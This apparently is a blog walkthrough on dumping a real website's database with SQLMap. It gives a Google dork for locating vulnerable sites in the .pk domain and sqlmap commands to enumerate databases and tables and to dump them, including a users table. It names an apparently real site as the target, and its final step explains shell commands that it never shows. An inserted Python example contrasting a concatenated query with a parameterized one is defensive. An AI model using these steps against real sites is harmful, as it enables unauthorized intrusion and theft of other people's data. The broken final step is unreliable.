Introduction
In this blog we will see how to dump the database of a vulnerable website using SQLMap. SQLMap is a powerful automated SQL injection tool used by both hackers and security researchers. So let's dump the database of a real website in a practical walkthrough (for educational purposes!).
Lab Environment:
To carry out the practical, you need:
Kali Linux OS / Parrot OS
Internet connection
Root permission to run the tools
Step 1: Install SQLMap:
If SQLMap is not already installed on your system, you can install it.
Linux & Mac:
sudo apt install sqlmap  # Debian-based (Ubuntu, Kali Linux)

Step 2: Find a Vulnerable Website
SQL injection is possible only when the input validation of a website is weak. Vulnerable URLs mostly look like this:
http://target.com/index.php?id=1
If it accepts URL parameter manipulation, the chances of SQL injection increase.
"site:pk inurl:php?Id=" is the Google dork to find vulnerable website URLs.
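
What weak input validation on an `id` parameter looks like on the server side, next to the corrected handler, as an added example that is not part of the original post. The table, rows and function names are constructed for illustration, and Python's sqlite3 stands in for the site's own code and database.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO articles VALUES (?, ?)",
        [(1, "Welcome"), (2, "Draft: unpublished"), (3, "Contact")],
    )
    return db

def get_article_vulnerable(db, raw_id):
    # Weak handling: the id taken from the URL is pasted into the SQL text,
    # so whatever the client sends becomes part of the statement itself.
    query = "SELECT id, title FROM articles WHERE id = " + raw_id
    return db.execute(query).fetchall()

def get_article_hardened(db, raw_id):
    # 1) Validate: the id must be a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    # 2) Parameterize: the value is bound as data and never parsed as SQL.
    query = "SELECT id, title FROM articles WHERE id = ?"
    return db.execute(query, (int(raw_id),)).fetchall()

def rejected(db, raw_id):
    """True when the hardened handler refuses the value."""
    try:
        get_article_hardened(db, raw_id)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    db = make_db()
    tampered = "1 OR 1=1"  # constructed value: the parameter was manipulated
    print("vulnerable, id=1       :", get_article_vulnerable(db, "1"))
    print("vulnerable, tampered   :", get_article_vulnerable(db, tampered))
    print("hardened,   id=1       :", get_article_hardened(db, "1"))
    print("hardened rejects tamper:", rejected(db, tampered))
```

With the concatenated query the tampered value returns every row; the hardened handler returns the same single row for `id=1` and refuses anything that is not an integer.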

Step 3: Test for SQL Injection
Now use sqlmap to test whether the website is vulnerable or not.
Run the command:
sqlmap -u "http://target.com/index.php?id=1" --dbs
This command means:
- -u = Specifies the target URL
- --dbs = Shows the available databases
If the website is vulnerable, it will show the available databases. If it is not vulnerable, it will not show any database.



Step 4: Dump the Database
When you determine that a website is vulnerable, use this command to dump a specific database.
sqlmap -u "http://target.com/index.php?id=1" -D target_database --dump-all
-D target_database = Specifies the name of the target database.
--dump-all = Dumps the database of that website.

If you want to see the tables of the database, use this command:
sqlmap -u "http://target.com/index.php?id=1" -D target_database --tables

In this command:
-D target_database = Specifies the name of the target database.
target_database = This is the name of the database.
--tables = This is used to show the database tables.
http://target.com/index.php?id=1 = This is the target website URL.

If you need data from a particular table, use this command:
sqlmap -u "http://target.com/index.php?id=1" -D target_database -T users --dump
In this command:
-T users = Targets the users table.
--dump = Dumps the data of that table.

Step 5: Show the Dumped Data
You can see the dumped data using this command:
cd = This is the command to change directory.
ls = This is the command to list all files and folders.
www.af.org.pk = This is the target website name.
cat = This is the command to view a file's contents.


Conclusion
SQLMap is a powerful tool that is useful for security testing. But remember that you should not misuse it: dumping the database of any website without permission is illegal. You should use it only for learning and authorized penetration testing!
If you need more tips on ethical hacking and penetration testing, let us know in the comments!